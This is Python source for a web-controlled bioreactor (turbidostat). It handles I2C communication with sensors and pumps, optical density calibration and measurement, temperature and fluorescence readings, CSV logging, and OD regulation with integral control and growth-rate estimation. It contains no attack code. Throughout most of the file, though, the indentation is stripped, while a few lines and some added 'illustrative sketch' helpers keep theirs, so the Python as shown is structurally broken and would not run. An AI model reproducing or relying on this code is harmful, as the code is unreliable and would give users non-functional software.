def CharacteriseDevice(M,Program):
    #This umbrella function runs the actual characterisation function in a thread to prevent Gunicorn worker timeout.
Program=str(Program)
if (Program=='C1'):
        cthread=Thread(target = CharacteriseDevice2, args=(M,)) #args must be a one-element tuple; a bare (M) would be unpacked character by character.
cthread.setDaemon(True)
cthread.start()
return('',204)
def CharacteriseDevice2(M):
global sysData
global sysItems
print('In1')
M=str(M)
if (M=="0"):
M=sysItems['UIDevice']
result= { 'LEDA' : {'nm410' : [],'nm440' : [],'nm470' : [],'nm510' : [],'nm550' : [],'nm583' : [],'nm620' : [],'nm670' : [],'CLEAR' : []},
'LEDB' : {'nm410' : [],'nm440' : [],'nm470' : [],'nm510' : [],'nm550' : [],'nm583' : [],'nm620' : [],'nm670' : [],'CLEAR' : []},
'LEDC' : {'nm410' : [],'nm440' : [],'nm470' : [],'nm510' : [],'nm550' : [],'nm583' : [],'nm620' : [],'nm670' : [],'CLEAR' : []},
'LEDD' : {'nm410' : [],'nm440' : [],'nm470' : [],'nm510' : [],'nm550' : [],'nm583' : [],'nm620' : [],'nm670' : [],'CLEAR' : []},
'LEDE' : {'nm410' : [],'nm440' : [],'nm470' : [],'nm510' : [],'nm550' : [],'nm583' : [],'nm620' : [],'nm670' : [],'CLEAR' : []},
'LEDF' : {'nm410' : [],'nm440' : [],'nm470' : [],'nm510' : [],'nm550' : [],'nm583' : [],'nm620' : [],'nm670' : [],'CLEAR' : []},
'LEDG' : {'nm410' : [],'nm440' : [],'nm470' : [],'nm510' : [],'nm550' : [],'nm583' : [],'nm620' : [],'nm670' : [],'CLEAR' : []},
'LASER650' : {'nm410' : [],'nm440' : [],'nm470' : [],'nm510' : [],'nm550' : [],'nm583' : [],'nm620' : [],'nm670' : [],'CLEAR' : []},
}
print('Got in!')
bands=['nm410' ,'nm440','nm470','nm510','nm550','nm583','nm620','nm670','CLEAR']
powerlevels=[0,0.01,0.02,0.03,0.04,0.05,0.06,0.07,0.08,0.09,0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9,1.0]
items= ['LEDA','LEDB','LEDC','LEDD','LEDE','LEDF','LEDG','LASER650']
gains=['x4','x4','x4','x4','x4','x4','x4','x1']
gi=-1
for item in items:
gi=gi+1
for power in powerlevels:
SetOutputTarget(M,item,power)
SetOutputOn(M,item,1)
GetSpectrum(M,gains[gi])
SetOutputOn(M,item,0)
print(item + ' ' + str(power))
for band in bands:
result[item][band].append(int(sysData[M]['AS7341']['spectrum'][band]))
addTerminal(M,'Measured Item = ' + str(item) + ' at power ' + str(power))
time.sleep(0.05)
filename = 'characterisation_data_' + M + '.txt'
f = open(filename,'w')
simplejson.dump(result,f)
f.close()
return
def I2CCom(M,device,rw,hl,data1,data2,SMBUSFLAG):
#Function used to manage I2C bus communications for ALL devices.
M=str(M) #Turbidostat to write to
device=str(device) #Name of device to be written to
rw=int(rw) #1 if read, 0 if write
hl=int(hl) #8 or 16
    SMBUSFLAG=int(SMBUSFLAG) # If this flag is set to 1 it means we are communicating with an SMBus device.
data1=int(data1) #First data/register
if hl<20:
        data2=int(data2) #Second data byte/register
global sysItems
global sysData
global sysDevices
if(sysData[M]['present']==0): #Something stupid has happened in software if this is the case!
        print(str(datetime.now()) + ' Trying to communicate with absent device - bug in software! Disabling hardware and software!')
sysItems['Watchdog']['ON']=0 #Basically this will crash all the electronics and the software.
out=0
tries=-1
os._exit(4)
#cID=str(M)+str(device)+'d'+str(data1)+'d'+str(data2) # This is an ID string for the communication that we are trying to send - not used at present
#Any time a thread gets to this point it will wait until the lock is free. Then, only one thread at a time will advance.
lock.acquire()
#We now connect the multiplexer to the appropriate device to allow digital communications.
tries=0
while(tries!=-1):
try:
sysItems['Multiplexer']['device'].write8(int(0x00),int(sysItems['Multiplexer'][M],2)) #We have established connection to correct device.
check=(sysItems['Multiplexer']['device'].readRaw8()) #We check that the Multiplexer is indeed connected to the correct channel.
if(check==int(sysItems['Multiplexer'][M],2)):
tries=-1
else:
tries=tries+1
time.sleep(0.02)
print(str(datetime.now()) + ' Multiplexer didnt switch ' + str(tries) + " times on " + str(M))
except: #If there is an error in the above.
tries=tries+1
time.sleep(0.02)
print(str(datetime.now()) + ' Failed Multiplexer Comms ' + str(tries) + " times")
if (tries>2):
try:
sysItems['Multiplexer']['device'].write8(int(0x00),int(0x00)) #Disconnect multiplexer.
print(str(datetime.now()) + 'Disconnected multiplexer on ' + str(M) + ', trying to connect again.')
except:
print(str(datetime.now()) + 'Failed to recover multiplexer on device ' + str(M))
if (tries==5 or tries==10 or tries==15):
toggleWatchdog() #Flip the watchdog pin to ensure it is working.
GPIO.output('P8_15', GPIO.LOW) #Flip the Multiplexer RESET pin. Note this reset function works on Control Board V1.2 and later.
time.sleep(0.1)
GPIO.output('P8_15', GPIO.HIGH)
time.sleep(0.1)
print(str(datetime.now()) + 'Did multiplexer hard-reset on ' + str(M))
if tries>20: #If it has failed a number of times then likely something is seriously wrong, so we crash the software.
sysItems['Watchdog']['ON']=0 #Basically this will crash all the electronics and the software.
out=0
print(str(datetime.now()) + 'Failed to communicate to Multiplexer 20 times. Disabling hardware and software!')
tries=-1
os._exit(4)
time.sleep(0.0005)
out=0;
tries=0
while(tries!=-1): #We now do appropriate read/write on the bus.
try:
if SMBUSFLAG==0:
if rw==1:
if hl==8:
out=int(sysDevices[M][device]['device'].readU8(data1))
elif(hl==16):
out=int(sysDevices[M][device]['device'].readU16(data1,data2))
else:
if hl==8:
sysDevices[M][device]['device'].write8(data1,data2)
out=1
elif(hl==16):
sysDevices[M][device]['device'].write16(data1,data2)
out=1
elif SMBUSFLAG==1:
out=sysDevices[M][device]['device'].read_word_data(sysDevices[M][device]['address'],data1)
tries=-1
except: #If the above fails then we can try again (a limited number of times)
tries=tries+1
if (device!="ThermometerInternal"):
print(str(datetime.now()) + ' Failed ' + str(device) + ' comms ' + str(tries) + " times on device " + str(M) )
time.sleep(0.02)
if (device=='AS7341'):
print(str(datetime.now()) + ' Failed AS7341 in I2CCom while trying to send ' + str(data1) + " and " + str(data2))
out=-1
tries=-1
if (tries>2 and device=="ThermometerInternal"): #We don't allow the internal thermometer to fail, since this is what we are using to see if devices are plugged in at all.
out=0
sysData[M]['present']=0
tries=-1
if tries>10: #In this case something else has gone wrong, so we panic.
sysItems['Watchdog']['ON']=0 #Basically this will crash all the electronics and the software.
out=0
sysData[M]['present']=0
print(str(datetime.now()) + 'Failed to communicate to a device 10 times. Disabling hardware and software!')
tries=-1
os._exit(4)
time.sleep(0.0005)
try:
sysItems['Multiplexer']['device'].write8(int(0x00),int(0x00)) #Disconnect multiplexer with each iteration.
except:
print(str(datetime.now()) + 'Failed to disconnect multiplexer on device ' + str(M))
lock.release() #Bus lock is released so next command can occur.
return(out)
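#Illustrative sketch, not used by the application: I2CCom above serialises all bus
#traffic through a single lock and retries failed transfers a bounded number of times
#before escalating. Stripped of the device-specific recovery logic, the skeleton of
#that pattern looks like the helper below (bus_lock and retry_limit are assumed
#parameters added for illustration, not names taken from the code above).
def _locked_retry_sketch(action,bus_lock,retry_limit=10):
    bus_lock.acquire()
    try:
        for attempt in range(retry_limit):
            try:
                return action() #One I2C read or write.
            except:
                time.sleep(0.02) #Brief pause before retrying the transfer.
        return None #Persistent failure; the real code disables the watchdog and exits here.
    finally:
        bus_lock.release()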
@application.route("/CalibrateOD/<item>/<M>/<value>/<value2>",methods=['POST'])
def CalibrateOD(M,item,value,value2):
#Used to calculate calibration value for OD measurements.
global sysData
item = str(item)
ODRaw = float(value)
ODActual = float(value2)
M=str(M)
if (M=="0"):
M=sysItems['UIDevice']
device=sysData[M]['OD']['device']
if (device=='LASER650'):
a=sysData[M]['OD0']['LASERa']#Retrieve the calibration factors for OD.
b=sysData[M]['OD0']['LASERb']
if (ODActual<0):
ODActual=0
print(str(datetime.now()) + "You put a negative OD into calibration! Setting it to 0")
        raw=((ODActual/a + (b/(2*a))**2)**0.5) - (b/(2*a)) #This is performing the inverse function of the quadratic OD calibration.
OD0=(10.0**raw)*ODRaw
if (OD0<sysData[M][item]['min']):
OD0=sysData[M][item]['min']
print(str(datetime.now()) + 'OD calibration value seems too low?!')
if (OD0>sysData[M][item]['max']):
OD0=sysData[M][item]['max']
print(str(datetime.now()) + 'OD calibration value seems too high?!')
sysData[M][item]['target']=OD0
print(str(datetime.now()) + "Calibrated OD")
elif (device=='LEDF'):
a=sysData[M]['OD0']['LEDFa']#Retrieve the calibration factors for OD.
if (ODActual<0):
ODActual=0
print("You put a negative OD into calibration! Setting it to 0")
if (M=='M0'):
CF=1299.0
elif (M=='M1'):
CF=1206.0
elif (M=='M2'):
CF=1660.0
elif (M=='M3'):
CF=1494.0
#raw=(ODActual)/a #THis is performing the inverse function of the linear OD calibration.
#OD0=ODRaw - raw*CF
OD0=ODRaw/ODActual
print(OD0)
if (OD0<sysData[M][item]['min']):
OD0=sysData[M][item]['min']
print('OD calibration value seems too low?!')
if (OD0>sysData[M][item]['max']):
OD0=sysData[M][item]['max']
print('OD calibration value seems too high?!')
sysData[M][item]['target']=OD0
print("Calibrated OD")
elif (device=='LEDA'):
a=sysData[M]['OD0']['LEDAa']#Retrieve the calibration factors for OD.
if (ODActual<0):
ODActual=0
print("You put a negative OD into calibration! Setting it to 0")
if (M=='M0'):
CF=422
elif (M=='M1'):
CF=379
elif (M=='M2'):
CF=574
elif (M=='M3'):
CF=522
#raw=(ODActual)/a #THis is performing the inverse function of the linear OD calibration.
#OD0=ODRaw - raw*CF
OD0=ODRaw/ODActual
print(OD0)
if (OD0<sysData[M][item]['min']):
OD0=sysData[M][item]['min']
print('OD calibration value seems too low?!')
if (OD0>sysData[M][item]['max']):
OD0=sysData[M][item]['max']
print('OD calibration value seems too high?!')
sysData[M][item]['target']=OD0
print("Calibrated OD")
return ('', 204)
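#Illustrative sketch, not called anywhere: for the LASER650 path above, calibration
#inverts the quadratic OD = a*raw**2 + b*raw used in MeasureOD below (taking the
#positive root) and then back-computes the blank transmission value OD0 such that
#log10(OD0/reading) reproduces the entered OD:
def _od_blank_sketch(od_actual,od_raw,a,b):
    raw=(od_actual/a+(b/(2*a))**2)**0.5-(b/(2*a)) #Positive root of the quadratic calibration.
    return (10.0**raw)*od_raw #Blank value consistent with the measured reading.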
@application.route("/MeasureOD/<M>",methods=['POST'])
def MeasureOD(M):
#Measures laser transmission and calculates calibrated OD from this.
global sysData
global sysItems
M=str(M)
if (M=="0"):
M=sysItems['UIDevice']
device=sysData[M]['OD']['device']
if (device=='LASER650'):
out=GetTransmission(M,'LASER650',['CLEAR'],1,255)
sysData[M]['OD0']['raw']=float(out[0])
a=sysData[M]['OD0']['LASERa']#Retrieve the calibration factors for OD.
b=sysData[M]['OD0']['LASERb']
try:
raw=math.log10(sysData[M]['OD0']['target']/sysData[M]['OD0']['raw'])
sysData[M]['OD']['current']=raw*b + raw*raw*a
except:
sysData[M]['OD']['current']=0;
print(str(datetime.now()) + ' OD Measurement exception on ' + str(device))
elif (device=='LEDF'):
out=GetTransmission(M,'LEDF',['CLEAR'],7,255)
sysData[M]['OD0']['raw']=out[0]
a=sysData[M]['OD0']['LEDFa']#Retrieve the calibration factors for OD.
try:
if (M=='M0'):
CF=1299.0
elif (M=='M1'):
CF=1206.0
elif (M=='M2'):
CF=1660.0
elif (M=='M3'):
CF=1494.0
#raw=out[0]/CF - sysData[M]['OD0']['target']/CF
raw=out[0]/sysData[M]['OD0']['target']
sysData[M]['OD']['current']=raw
except:
sysData[M]['OD']['current']=0;
print(str(datetime.now()) + ' OD Measurement exception on ' + str(device))
elif (device=='LEDA'):
out=GetTransmission(M,'LEDA',['CLEAR'],7,255)
sysData[M]['OD0']['raw']=out[0]
a=sysData[M]['OD0']['LEDAa']#Retrieve the calibration factors for OD.
try:
if (M=='M0'):
CF=422.0
elif (M=='M1'):
CF=379.0
elif (M=='M2'):
CF=574.0
elif (M=='M3'):
CF=522.0
#raw=out[0]/CF - sysData[M]['OD0']['target']/CF
raw=out[0]/sysData[M]['OD0']['target']
#sysData[M]['OD']['current']=raw*a
sysData[M]['OD']['current']=raw
except:
sysData[M]['OD']['current']=0;
print(str(datetime.now()) + ' OD Measurement exception on ' + str(device))
return ('', 204)
@application.route("/MeasureFP/<M>",methods=['POST'])
def MeasureFP(M):
#Responsible for measuring each of the active Fluorescent proteins.
global sysData
M=str(M)
if (M=="0"):
M=sysItems['UIDevice']
for FP in ['FP1','FP2','FP3']:
if sysData[M][FP]['ON']==1:
Gain=int(sysData[M][FP]['Gain'][1:])
out=GetTransmission(M,sysData[M][FP]['LED'],[sysData[M][FP]['BaseBand'],sysData[M][FP]['Emit1Band'],sysData[M][FP]['Emit2Band']],Gain,255)
sysData[M][FP]['Base']=float(out[0])
if (sysData[M][FP]['Base']>0):
sysData[M][FP]['Emit1']=float(out[1])/sysData[M][FP]['Base']
sysData[M][FP]['Emit2']=float(out[2])/sysData[M][FP]['Base']
else:#This might happen if you try to measure in CLEAR whilst also having CLEAR as baseband!
sysData[M][FP]['Emit1']=float(out[1])
sysData[M][FP]['Emit2']=float(out[2])
return ('', 204)
@application.route("/MeasureTemp/<which>/<M>",methods=['POST'])
def MeasureTemp(M,which):
#Used to measure temperature from each thermometer.
global sysData
global sysItems
if (M=="0"):
M=sysItems['UIDevice']
M=str(M)
which='Thermometer' + str(which)
if (which=='ThermometerInternal' or which=='ThermometerExternal'):
getData=I2CCom(M,which,1,16,0x05,0,0)
getDataBinary=bin(getData)
tempData=getDataBinary[6:]
temperature=float(int(tempData,2))/16.0
elif(which=='ThermometerIR'):
getData=I2CCom(M,which,1,0,0x07,0,1)
temperature = (getData*0.02) - 273.15
if sysData[M]['present']==0:
temperature=0.0
if temperature>100.0:#It seems sometimes the IR thermometer returns a value of 1000 due to an error. This prevents that.
temperature=sysData[M][which]['current']
sysData[M][which]['current']=temperature
return ('', 204)
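#Note on the conversions above, added for clarity: the contact thermometers report
#temperature in sixteenths of a degree Celsius once their leading status bits are
#stripped, while the IR thermometer reports in 0.02 K counts, hence
#temperature = raw*0.02 - 273.15.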
def setPWM(M,device,channels,fraction,ConsecutiveFails):
#Sets up the PWM chip (either the one in the reactor or on the pump board)
global sysItems
global sysDevices
if sysDevices[M][device]['startup']==0: #The following boots up the respective PWM device to the correct frequency. Potentially there is a bug here; if the device loses power after this code is run for the first time it may revert to default PWM frequency.
I2CCom(M,device,0,8,0x00,0x10,0) #Turns off device. Also disables all-call functionality at bit 0 so it won't respond to address 0x70
I2CCom(M,device,0,8,0x04,0xe6,0) #Sets SubADDR3 of the PWM chips to be 0x73 instead of 0x74 to avoid any potential collision with the multiplexer @ 0x74
I2CCom(M,device,0,8,0xfe,sysDevices[M][device]['frequency'],0) #Sets frequency of PWM oscillator.
sysDevices[M][device]['startup']=1
I2CCom(M,device,0,8,0x00,0x00,0) #Turns device on
timeOn=int(fraction*4095.99)
I2CCom(M,device,0,8,channels['ONL'],0x00,0)
I2CCom(M,device,0,8,channels['ONH'],0x00,0)
OffVals=bin(timeOn)[2:].zfill(12)
HighVals='0000' + OffVals[0:4]
LowVals=OffVals[4:12]
I2CCom(M,device,0,8,channels['OFFL'],int(LowVals,2),0)
I2CCom(M,device,0,8,channels['OFFH'],int(HighVals,2),0)
if (device=='Pumps'):
I2CCom(M,device,0,8,channels['ONL'],0x00,0)
I2CCom(M,device,0,8,channels['ONH'],0x00,0)
I2CCom(M,device,0,8,channels['OFFL'],int(LowVals,2),0)
I2CCom(M,device,0,8,channels['OFFH'],int(HighVals,2),0)
else:
CheckLow=I2CCom(M,device,1,8,channels['OFFL'],-1,0)
CheckHigh=I2CCom(M,device,1,8,channels['OFFH'],-1,0)
CheckLowON=I2CCom(M,device,1,8,channels['ONL'],-1,0)
CheckHighON=I2CCom(M,device,1,8,channels['ONH'],-1,0)
if(CheckLow!=(int(LowVals,2)) or CheckHigh!=(int(HighVals,2)) or CheckHighON!=int(0x00) or CheckLowON!=int(0x00)): #We check to make sure it has been set to appropriate values.
ConsecutiveFails=ConsecutiveFails+1
print(str(datetime.now()) + ' Failed transmission test on ' + str(device) + ' ' + str(ConsecutiveFails) + ' times consecutively on device ' + str(M) )
if ConsecutiveFails>10:
sysItems['Watchdog']['ON']=0 #Basically this will crash all the electronics and the software.
print(str(datetime.now()) + 'Failed to communicate to PWM 10 times. Disabling hardware and software!')
os._exit(4)
else:
time.sleep(0.1)
sysItems['FailCount']=sysItems['FailCount']+1
setPWM(M,device,channels,fraction,ConsecutiveFails)
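#Illustrative sketch, not called by the application: setPWM above expresses a duty
#fraction as a 12-bit OFF count (the ON count stays at zero) and writes it as a low
#byte plus a high nibble. The equivalent packing, added only for clarity, is:
def _pwm_off_bytes_sketch(fraction):
    off_count=int(fraction*4095.99) #OFF tick within the 4096-tick PWM period.
    low_byte=off_count&0xFF #Bottom eight bits, as LowVals above.
    high_byte=(off_count>>8)&0x0F #'0000' plus the top four bits, as HighVals above.
    return low_byte,high_byte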
def csvData(M):
#Used to format current data and write a new row to CSV file output. Note if you want to record any additional parameters/measurements then they need to be added to this function.
global sysData
M=str(M)
fieldnames = ['exp_time','od_measured','od_setpoint','od_zero_setpoint','thermostat_setpoint','heating_rate',
'internal_air_temp','external_air_temp','media_temp','opt_gen_act_int','pump_1_rate','pump_2_rate',
'pump_3_rate','pump_4_rate','media_vol','stirring_rate','LED_395nm_setpoint','LED_457nm_setpoint',
'LED_500nm_setpoint','LED_523nm_setpoint','LED_595nm_setpoint','LED_623nm_setpoint',
'LED_6500K_setpoint','laser_setpoint','LED_UV_int','FP1_base','FP1_emit1','FP1_emit2','FP2_base',
'FP2_emit1','FP2_emit2','FP3_base','FP3_emit1','FP3_emit2','custom_prog_param1','custom_prog_param2',
'custom_prog_param3','custom_prog_status','zigzag_target','growth_rate']
row=[sysData[M]['time']['record'][-1],
sysData[M]['OD']['record'][-1],
sysData[M]['OD']['targetrecord'][-1],
sysData[M]['OD0']['target'],
sysData[M]['Thermostat']['record'][-1],
sysData[M]['Heat']['target']*float(sysData[M]['Heat']['ON']),
sysData[M]['ThermometerInternal']['record'][-1],
sysData[M]['ThermometerExternal']['record'][-1],
sysData[M]['ThermometerIR']['record'][-1],
sysData[M]['Light']['record'][-1],
sysData[M]['Pump1']['record'][-1],
sysData[M]['Pump2']['record'][-1],
sysData[M]['Pump3']['record'][-1],
sysData[M]['Pump4']['record'][-1],
sysData[M]['Volume']['target'],
sysData[M]['Stir']['target']*sysData[M]['Stir']['ON'],]
for LED in ['LEDA','LEDB','LEDC','LEDD','LEDE','LEDF','LEDG','LASER650']:
row=row+[sysData[M][LED]['target']]
row=row+[sysData[M]['UV']['target']*sysData[M]['UV']['ON']]
for FP in ['FP1','FP2','FP3']:
if sysData[M][FP]['ON']==1:
row=row+[sysData[M][FP]['Base']]
row=row+[sysData[M][FP]['Emit1']]
row=row+[sysData[M][FP]['Emit2']]
else:
row=row+([0.0, 0.0, 0.0])
row=row+[sysData[M]['Custom']['param1']*float(sysData[M]['Custom']['ON'])]
row=row+[sysData[M]['Custom']['param2']*float(sysData[M]['Custom']['ON'])]
row=row+[sysData[M]['Custom']['param3']*float(sysData[M]['Custom']['ON'])]
row=row+[sysData[M]['Custom']['Status']*float(sysData[M]['Custom']['ON'])]
row=row+[sysData[M]['Zigzag']['target']*float(sysData[M]['Zigzag']['ON'])]
row=row+[sysData[M]['GrowthRate']['current']*sysData[M]['Zigzag']['ON']]
#Following can be uncommented if you are recording ALL spectra for e.g. biofilm experiments
#bands=['nm410' ,'nm440','nm470','nm510','nm550','nm583','nm620','nm670','CLEAR','NIR']
#items= ['LEDA','LEDB','LEDC','LEDD','LEDE','LEDF','LEDG','LASER650']
#for item in items:
# for band in bands:
# row=row+[sysData[M]['biofilm'][item][band]]
filename = sysData[M]['Experiment']['startTime'] + '_' + M + '_data' + '.csv'
filename=filename.replace(":","_")
lock.acquire() #We are avoiding writing to a file at the same time as we do digital communications, since it might potentially cause the computer to lag and consequently data transfer to fail.
if os.path.isfile(filename) is False: #Only if we are starting a fresh file
if (len(row) == len(fieldnames)): #AND the fieldnames match up with what is being written.
with open(filename, 'a') as csvFile:
writer = csv.writer(csvFile)
writer.writerow(fieldnames)
else:
print('CSV_WRITER: mismatch between column num and header num')
with open(filename, 'a') as csvFile: # Here we append the new data to our CSV file.
writer = csv.writer(csvFile)
writer.writerow(row)
csvFile.close()
lock.release()
def downsample(M):
    #In order to prevent the UI getting too laggy, we downsample the stored data every few hours. Note that this doesn't downsample data that has already been written to CSV, so no data is ever lost.
global sysData
M=str(M)
#We now generate a new time vector which is downsampled at half the rate of the previous one
time=np.asarray(sysData[M]['time']['record'])
newlength=int(round(len(time)/2,2)-1)
tnew=np.linspace(time[0],time[-11],newlength)
tnew=np.concatenate([tnew,time[-10:]])
#In the following we make a new array, index, which has the indices at which we want to resample our existing data vectors.
i=0
index=np.zeros((len(tnew),),dtype=int)
for timeval in tnew:
idx = np.searchsorted(time, timeval, side="left")
if idx > 0 and (idx == len(time) or np.abs(timeval - time[idx-1]) < np.abs(timeval - time[idx])):
index[i]=idx-1
else:
index[i]=idx
i=i+1
sysData[M]['time']['record']=downsampleFunc(sysData[M]['time']['record'],index)
sysData[M]['OD']['record']=downsampleFunc(sysData[M]['OD']['record'],index)
sysData[M]['OD']['targetrecord']=downsampleFunc(sysData[M]['OD']['targetrecord'],index)
sysData[M]['Thermostat']['record']=downsampleFunc(sysData[M]['Thermostat']['record'],index)
sysData[M]['Light']['record']=downsampleFunc(sysData[M]['Light']['record'],index)
sysData[M]['ThermometerInternal']['record']=downsampleFunc(sysData[M]['ThermometerInternal']['record'],index)
sysData[M]['ThermometerExternal']['record']=downsampleFunc(sysData[M]['ThermometerExternal']['record'],index)
sysData[M]['ThermometerIR']['record']=downsampleFunc(sysData[M]['ThermometerIR']['record'],index)
sysData[M]['Pump1']['record']=downsampleFunc(sysData[M]['Pump1']['record'],index)
sysData[M]['Pump2']['record']=downsampleFunc(sysData[M]['Pump2']['record'],index)
sysData[M]['Pump3']['record']=downsampleFunc(sysData[M]['Pump3']['record'],index)
sysData[M]['Pump4']['record']=downsampleFunc(sysData[M]['Pump4']['record'],index)
sysData[M]['GrowthRate']['record']=downsampleFunc(sysData[M]['GrowthRate']['record'],index)
for FP in ['FP1','FP2','FP3']:
sysData[M][FP]['BaseRecord']=downsampleFunc(sysData[M][FP]['BaseRecord'],index)
sysData[M][FP]['Emit1Record']=downsampleFunc(sysData[M][FP]['Emit1Record'],index)
sysData[M][FP]['Emit2Record']=downsampleFunc(sysData[M][FP]['Emit2Record'],index)
def downsampleFunc(datain,index):
    #This function is used to downsample the arrays, taking the points selected by the index vector.
datain=list(datain)
newdata=[]
newdata=np.zeros((len(index),),dtype=float)
i=0
for loc in list(index):
newdata[i]=datain[int(loc)]
i=i+1
return list(newdata)
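#Illustrative usage, not executed by the application: downsampleFunc simply picks the
#record entries at the pre-computed nearest-neighbour indices, e.g.
#downsampleFunc([0.0,1.0,2.0,3.0],[0,2,3]) returns [0.0,2.0,3.0].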
def RegulateOD(M):
#Function responsible for turbidostat functionality (OD control)
global sysData
global sysItems
M=str(M)
if (sysData[M]['Zigzag']['ON']==1):
TargetOD=sysData[M]['OD']['target']
        Zigzag(M) #Dithers the OD setpoint around the target and updates the growth-rate estimate.
Pump1Current=abs(sysData[M]['Pump1']['target'])
Pump2Current=abs(sysData[M]['Pump2']['target'])
Pump1Direction=sysData[M]['Pump1']['direction']
Pump2Direction=sysData[M]['Pump2']['direction']
ODNow=sysData[M]['OD']['current']
ODTarget=sysData[M]['OD']['target']
    if (ODTarget<=0): #There could be an error on the log operation if ODTarget is 0!
ODTarget=0.000001
errorTerm=ODTarget-ODNow
Volume=sysData[M]['Volume']['target']
PercentPerMin=4*60/Volume #Gain parameter to convert from pump rate to rate of OD reduction.
if sysData[M]['Experiment']['cycles']<3:
Pump1=0 #In first few cycles we do precisely no pumping.
elif len(sysData[M]['time']['record']) < 2:
Pump1=0 #In first few cycles we do precisely no pumping.
addTerminal(M, "Warning: Tried to calculate time elapsed with fewer than two " +\
"timepoints recorded. If you see this message a lot, there may be " +\
"a more serious problem.")
else:
ODPast=sysData[M]['OD']['record'][-1]
        timeElapsed=((sysData[M]['time']['record'][-1])-(sysData[M]['time']['record'][-2]))/60.0 #Amount of time between measurements in minutes
if (ODNow>0):
try:
NewGrowth = math.log((ODTarget)/(ODNow))/timeElapsed
except:
NewGrowth=0.0
else:
NewGrowth=0.0
Pump1=-1.0*NewGrowth/PercentPerMin
#Next Section is Integral Control
ODerror=ODNow-ODTarget
    # Integrator 1 - responsible for short-term integration to overcome troubles if an input pump makes a poor seal.
ODIntegral=sysData[M]['OD']['Integral']
if ODerror<0.01:
ODIntegral=0
elif (abs(ODNow-ODPast)<0.05 and ODerror>0.025): #preventing massive accidental jumps causing trouble with this integral term.
ODIntegral=ODIntegral+0.1*ODerror
sysData[M]['OD']['Integral']=ODIntegral
# Integrator 2
ODIntegral2=sysData[M]['OD']['Integral2']
if (abs(ODerror)>0.1 and abs(ODNow-ODPast)<0.05):
ODIntegral2=0
elif (abs(ODNow-ODPast)<0.1):
ODIntegral2=ODIntegral2+0.01*ODerror
        Pump1=Pump1*0.7 #This is essentially enforcing a smaller proportional gain when we are near the OD setpoint.
sysData[M]['OD']['Integral2']=ODIntegral2
Pump1=Pump1+ODIntegral+ODIntegral2
if (ODNow-ODPast)>0.04: #This is to counteract noisy jumps in OD measurements from causing mayhem in the regulation algorithm.
Pump1=0.0
#Make sure values are in appropriate range. We want to limit the maximum size of pump1 to prevent it from overflowing.
if(Pump1>0.02):
Pump1=0.02
elif(Pump1<0):
Pump1=0.0
if(sysData[M]['Chemostat']['ON']==1):
Pump1=float(sysData[M]['Chemostat']['p1'])
#Set new Pump targets
sysData[M]['Pump1']['target']=Pump1*Pump1Direction
sysData[M]['Pump2']['target']=(Pump1*4+0.07)*Pump2Direction
if(sysData[M]['Experiment']['cycles']%5==1): #Every so often we do a big output pump to make sure tubes are clear.
sysData[M]['Pump2']['target']=0.25*sysData[M]['Pump2']['direction']
if (sysData[M]['Experiment']['cycles']>15):
        #This section checks if we have added any liquid recently; if not, we don't run pump 2 since it won't be needed.
pastpumping=abs(sysData[M]['Pump1']['target'])
for pv in range(-10,-1):
pastpumping=pastpumping+abs(sysData[M]['Pump1']['record'][pv])
if pastpumping==0.0:
sysData[M]['Pump2']['target']=0.0
sysData[M]['Pump1']['target']=0.0 #This should be equal to 0 anyway.
SetOutputOn(M,'Pump1',1)
SetOutputOn(M,'Pump2',1)
if (sysData[M]['Zigzag']['ON']==1): #If the zigzag growth estimation is running then we change OD setpoint appropriately.
try:
sysData[M]['OD']['target']=TargetOD
except:
print('Somehow you managed to activate Zigzag at a sub-optimal time')
#Do nothing
return
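#Illustrative sketch, not called anywhere: the proportional part of the turbidostat
#controller above works out the dilution needed to bring the measured OD back to the
#setpoint over one measurement interval, using the volume-dependent gain
#PercentPerMin = 4*60/Volume. The integral terms and clamping applied in RegulateOD
#are omitted here.
def _turbidostat_proportional_sketch(od_target,od_now,dt_minutes,volume_ml):
    percent_per_min=4.0*60.0/volume_ml #Gain converting pump duty to fractional dilution per minute, as above.
    growth_needed=math.log(od_target/od_now)/dt_minutes #Negative when OD is above target.
    return -1.0*growth_needed/percent_per_min #Pump1 duty before integral action and limits.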
def Zigzag(M):
    #This function dithers OD in a "zigzag" pattern, and estimates growth rate. This function is only called when ZigZag mode is active.
global sysData
global sysItems
M=str(M)
centre=sysData[M]['OD']['target']
current=sysData[M]['OD']['current']
zig=sysData[M]['Zigzag']['Zig']
iteration=sysData[M]['Experiment']['cycles']
try:
last=sysData[M]['OD']['record'][-1]
except: #This will happen if you activate Zigzag in first control iteration!
last=current
if (current<centre-zig and last<centre):
if(sysData[M]['Zigzag']['target']!=5.0):
sysData[M]['Zigzag']['SwitchPoint']=iteration
sysData[M]['Zigzag']['target']=5.0 #an excessively high OD value.
elif (current>centre+zig and last>centre+zig):
sysData[M]['Zigzag']['target']=centre-zig*1.5
sysData[M]['Zigzag']['SwitchPoint']=iteration
sysData[M]['OD']['target']=sysData[M]['Zigzag']['target']
#Subsequent section is for growth estimation.
TimeSinceSwitch=iteration-sysData[M]['Zigzag']['SwitchPoint']
    if (iteration>6 and TimeSinceSwitch>5 and current > 0 and last > 0): #The reason we wait a few minutes after starting growth is that new media may still be being introduced, and it takes a while for growth to get going.
dGrowthRate=(math.log(current)-math.log(last))*60.0 #Converting to units of 1/hour
sysData[M]['GrowthRate']['current']=sysData[M]['GrowthRate']['current']*0.95 + dGrowthRate*0.05 #We are essentially implementing an online growth rate estimator with learning rate 0.05
return
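#Illustrative sketch, not called anywhere: the growth-rate estimate above is an
#exponential moving average (learning rate 0.05) of the per-cycle change in log OD,
#scaled by 60 to give units of 1/hour (one cycle per minute is assumed there).
def _growth_rate_update_sketch(previous_estimate,od_now,od_last,learning_rate=0.05):
    instantaneous=(math.log(od_now)-math.log(od_last))*60.0 #Per-hour growth rate implied by one cycle.
    return previous_estimate*(1.0-learning_rate)+instantaneous*learning_rate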
@application.route("/ExperimentReset",methods=['POST'])
def ExperimentReset():
#Resets parameters/values of a given experiment.
initialise(sysItems['UIDevice'])
return ('', 204)
@application.route("/Experiment/<value>/<M>",methods=['POST'])
def ExperimentStartStop(M,value):
#Stops or starts an experiment.
global sysData
global sysDevices
global sysItems
M=str(M)
if (M=="0"):
M=sysItems['UIDevice']
value=int(value)
#Turning it on involves keeping current pump directions,
if (value and (sysData[M]['Experiment']['ON']==0)):
sysData[M]['Experiment']['ON']=1
addTerminal(M,'Experiment Started')
if (sysData[M]['Experiment']['cycles']==0):
now=datetime.now()
timeString=now.strftime("%Y-%m-%d %H:%M:%S")
